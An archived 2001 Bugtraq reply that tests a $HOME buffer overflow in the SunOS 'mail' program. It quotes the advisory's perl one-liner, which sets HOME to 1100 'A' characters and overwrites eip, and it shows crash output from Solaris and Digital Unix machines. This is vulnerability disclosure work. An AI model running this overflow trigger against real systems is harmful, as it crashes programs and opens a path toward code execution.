[20874] in bugtraq

home help back first fref pref prev next nref lref last post

Re: $HOME buffer overflow in SunOS 5.8 x86

daemon@ATHENA.MIT.EDU (Gunnar Wolf)
Tue Jun 5 20:37:23 2001

Date: Tue, 5 Jun 2001 13:54:11 -0500 (CDT)
From: Gunnar Wolf <gwolf@campus.iztacala.unam.mx>
To: "Juergen P. Meier" <jpm@class.de>
Cc: Georgi Guninski <guninski@guninski.com>,
        Bugtraq <BUGTRAQ@securityfocus.com>
In-Reply-To: <20010605153305.A24252@fm.rz.fh-muenchen.de>
Message-ID: <Pine.BSO.4.31.0106051346100.1152-100000@campus.iztacala.unam.mx>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

> On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> > $HOME buffer overflow in SunOS 5.8 x86
> > Systems affected:
> > SunOS 5.8 x86 have not tested on other OSes
> > Risk: Medium
> > Date: 4 June 2001
> >
> > Details:
> > HOME=`perl -e 'print "A"x1100'` ; export HOME
> > mail a
> > CTL-C
> > eip gets smashed with 0x41414141.
>
>
> 0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
> 0:jpmeier@sol:/home/jpmeier> mail a
> ^Cmail: Mail saved in dead.letter
> 1:jpmeier@sol:/home/jpmeier> uname -a
> SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
>
>
> also tried larger buffers.
>
>
> Solaris/sparc appears not vulnerable. Maybe its an x86 bug only

Solaris 7/Sparc is vulnerable:

[gwolf@sun gwolf]$ uname -a
SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10
[gwolf@sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME
[gwolf@sun gwolf]$ mail a
^Cmail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
(...)

Digital Unix V4.0C is vulnerable:

digital> uname -a
OSF1 digital V4.0 564.32 alpha
digital> setenv HOME `perl -e 'print "a"x1100'`
Received disconnect: Command terminated on signal 6.

[and I am logged out of the machine]

I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha
and Debian GNU/Linux 2.2r3/i386, and they are not vulnerable.

------------------------------------------------------------
Gunnar Wolf - gwolf@campus.iztacala.unam.mx - (+52)5623-1119
Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM
Departamento de Seguridad en Computo   -   DGSCA    -   UNAM
------------------------------------------------------------
Quidquid latine dictum sit, altum viditur.
home help back first fref pref prev next nref lref last post